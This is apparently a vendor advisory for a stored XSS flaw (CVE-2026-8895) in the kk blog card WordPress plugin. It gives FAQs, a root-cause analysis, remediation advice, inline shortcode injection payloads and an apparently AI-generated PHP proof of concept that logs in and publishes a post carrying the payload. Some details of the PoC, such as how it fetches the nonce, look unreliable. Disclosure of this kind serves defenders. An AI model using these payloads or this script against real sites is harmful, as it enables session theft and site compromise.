What is CVE-2026-8895?

CVE-2026-8895 is a stored cross-site scripting (XSS) vulnerability in the kk blog card plugin for WordPress, affecting versions up to and including 1.3. It allows authenticated users with contributor-level access or higher to inject malicious scripts via the ‘blog-card’ shortcode.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping on the ‘href’ and ‘type’ attributes of the shortcode. Attackers can insert scripts that will execute when other users view the affected page, potentially compromising their sessions.

Who is affected by this vulnerability?

Authenticated users with contributor-level access or higher are affected, as they can exploit the vulnerability. This includes contributors, authors, editors, and administrators who can create or edit posts using the kk blog card plugin.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify if the kk blog card plugin is installed and if the version is 1.3 or lower. Additionally, review any posts or pages that may contain the ‘[blog-card]’ shortcode for suspicious attributes.

What should I do to fix this vulnerability?

The best course of action is to deactivate and remove the kk blog card plugin immediately, as no patched version is currently available. Additionally, consider using alternative plugins that do not have this vulnerability.

What does the CVSS score of 6.4 indicate?

A CVSS score of 6.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk to the site if exploited. It requires authenticated access, which limits the attack vector but still allows for serious consequences.

What are the practical risks of this vulnerability?

If exploited, this vulnerability can allow attackers to execute scripts that may steal session cookies, perform actions on behalf of users, or deface the website. The stored XSS can affect any user who views the compromised content, including high-privilege users.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can use the WordPress REST API to create a post containing a malicious ‘[blog-card]’ shortcode. It shows how the malicious payload can be injected and executed when other users access the affected page.

Stored XSS occurs when an attacker injects a script into a web application that is stored on the server and later served to users. This means the malicious script can execute in the context of other users who access the affected content.

What are the recommended security practices to prevent such vulnerabilities?

To prevent vulnerabilities like CVE-2026-8895, ensure that all plugins are regularly updated, use reputable plugins, and implement input validation and output escaping in custom code. Regular security audits and monitoring can also help identify potential issues.

Is there a way to mitigate the risk while waiting for a patch?

While waiting for a patch, the best mitigation is to deactivate and remove the vulnerable plugin. Additionally, review user roles and permissions to limit access to trusted users only.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately change all user passwords, remove any suspicious content, and restore from a clean backup if necessary. Conduct a thorough security audit to identify and remediate any vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 9, 2026

CVE-2026-8895: kk blog card <= 1.3 Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes PoC, Patch Analysis & Rule

CVE ID CVE-2026-8895

Plugin kk-blog-card

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.3

Patched Version —

Disclosed June 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-8895 (metadata-based): This vulnerability allows authenticated attackers with contributor-level access or higher to inject stored cross-site scripting (XSS) through the ‘blog-card’ shortcode in the kk blog card plugin for WordPress up to version 1.3. The attack targets the shortcode callback registered in kk-blog-card-shortcode.php. The CVSS score is 6.4 (Medium), with a network attack vector, low complexity, required privileges (contributor+), no user interaction, and a changed scope.

The root cause is insufficient input sanitization and output escaping on the ‘href’ and ‘type’ shortcode attributes. The plugin concatenates these attributes directly into HTML attribute contexts without proper escaping. This is inferred from the CWE classification (79) and the description, which explicitly states the vulnerable attributes and the direct concatenation. No code diff is available, but the pattern is consistent with WordPress shortcode vulnerabilities where developers use attributes without calling esc_attr() or wp_kses().

Exploitation is straightforward. An attacker with a contributor account (or higher) creates or edits a WordPress post or page. They insert the [blog-card] shortcode with malicious values in the ‘href’ or ‘type’ attributes. For example, [blog-card href=’http://example.com” onmouseover=”alert(1)”‘] or [blog-card type='”>alert(1)’]. The shortcode callback processes these attributes without sanitization, embedding them into the HTML. When any user (including administrators) views the compromised page, the injected script executes in their browser. The attack targets the WordPress post editor and no AJAX endpoints are needed, as the shortcode is rendered server-side during page load.

Remediation requires the plugin developer to apply proper input sanitization and output escaping to the ‘href’ and ‘type’ attributes before rendering. Specifically, the plugin should use WordPress functions like esc_url() for the ‘href’ attribute and esc_attr() for both attributes when outputting in HTML attribute contexts. Additionally, the plugin should use sanitize_text_field() or similar sanitization functions before storing the shortcode attributes. Since no patched version is available, users must deactivate and remove the plugin immediately.

The impact is limited to authenticated attackers with contributor+ access, but the stored XSS can compromise high-privilege users who view the page. An attacker could steal session cookies, perform actions on behalf of an administrator (e.g., create new admin users), deface the site, or inject malicious redirects. While the CVSS indicates low CIA impact, the scope change means the injected script can affect the broader WordPress application beyond the vulnerable plugin, enabling privilege escalation in practice.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-8895 - kk blog card <= 1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes

// Configuration
$target_url = 'http://example.com'; // Change to the target WordPress site URL
$username = 'attacker';             // WordPress user with Contributor role or higher
$password = 'password';

// Simplified PoC: Uses WordPress REST API to create a post with malicious shortcode
// Assumes the WP REST API is enabled and the user has 'edit_posts' capability.

// Payload: shortcode with XSS in the 'href' attribute
// The payload closes the href attribute and injects an onmouseover event
$payload = '[blog-card href="http://evil.com/" onmouseover="alert(1)" type="link"]';

// Step 1: Authenticate and get a nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log+In&redirect_to=' . urlencode($target_url . '/wp-admin/') . '&testcookie=1');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);

// Step 2: Get a REST API nonce
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php?action=rest-nonce');
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);
$nonce = trim($response);

if (empty($nonce)) {
    die('Failed to retrieve nonce. Ensure the user is logged in and the REST API is accessible.');
}

// Step 3: Create a new post with the malicious shortcode
$post_data = array(
    'title'   => 'Atomic Edge CVE-2026-8895 Test',
    'content' => $payload,
    'status'  => 'publish',
    'meta_input' => array(
        '_atomic_edge_test' => 1 // Marker to identify the test post
    )
);

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-json/wp/v2/posts');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'X-WP-Nonce: ' . $nonce
));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);
$result = json_decode($response, true);

if (isset($result['id'])) {
    echo '[+] Post created successfully. Visit: ' . $result['link'] . PHP_EOL;
    echo '[+] The XSS payload will trigger when a user hovers over the blog-card link.' . PHP_EOL;
} else {
    echo '[-] Failed to create post. Response:' . PHP_EOL;
    print_r($result);
}

curl_close($ch);

// Clean up cookies
unlink('/tmp/cookies.txt');
?>

Frequently Asked Questions

What is CVE-2026-8895?
Understanding the vulnerability
CVE-2026-8895 is a stored cross-site scripting (XSS) vulnerability in the kk blog card plugin for WordPress, affecting versions up to and including 1.3. It allows authenticated users with contributor-level access or higher to inject malicious scripts via the ‘blog-card’ shortcode.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping on the ‘href’ and ‘type’ attributes of the shortcode. Attackers can insert scripts that will execute when other users view the affected page, potentially compromising their sessions.
Who is affected by this vulnerability?
Identifying impacted users
Authenticated users with contributor-level access or higher are affected, as they can exploit the vulnerability. This includes contributors, authors, editors, and administrators who can create or edit posts using the kk blog card plugin.
How can I check if my site is vulnerable?
Assessing your WordPress installation
To check if your site is vulnerable, verify if the kk blog card plugin is installed and if the version is 1.3 or lower. Additionally, review any posts or pages that may contain the ‘[blog-card]’ shortcode for suspicious attributes.
What should I do to fix this vulnerability?
Remediation steps
The best course of action is to deactivate and remove the kk blog card plugin immediately, as no patched version is currently available. Additionally, consider using alternative plugins that do not have this vulnerability.
What does the CVSS score of 6.4 indicate?
Understanding severity ratings
A CVSS score of 6.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk to the site if exploited. It requires authenticated access, which limits the attack vector but still allows for serious consequences.
What are the practical risks of this vulnerability?
Potential impacts on your site
If exploited, this vulnerability can allow attackers to execute scripts that may steal session cookies, perform actions on behalf of users, or deface the website. The stored XSS can affect any user who views the compromised content, including high-privilege users.
How does the proof of concept demonstrate the issue?
Understanding the PoC
The proof of concept illustrates how an attacker can use the WordPress REST API to create a post containing a malicious ‘[blog-card]’ shortcode. It shows how the malicious payload can be injected and executed when other users access the affected page.
What is stored XSS?
Defining the attack type
Stored XSS occurs when an attacker injects a script into a web application that is stored on the server and later served to users. This means the malicious script can execute in the context of other users who access the affected content.
What are the recommended security practices to prevent such vulnerabilities?
Best practices for WordPress security
To prevent vulnerabilities like CVE-2026-8895, ensure that all plugins are regularly updated, use reputable plugins, and implement input validation and output escaping in custom code. Regular security audits and monitoring can also help identify potential issues.
Is there a way to mitigate the risk while waiting for a patch?
Temporary risk management strategies
While waiting for a patch, the best mitigation is to deactivate and remove the vulnerable plugin. Additionally, review user roles and permissions to limit access to trusted users only.
What should I do if I suspect my site has been compromised?
Response to potential exploitation
If you suspect your site has been compromised, immediately change all user passwords, remove any suspicious content, and restore from a clean backup if necessary. Conduct a thorough security audit to identify and remediate any vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started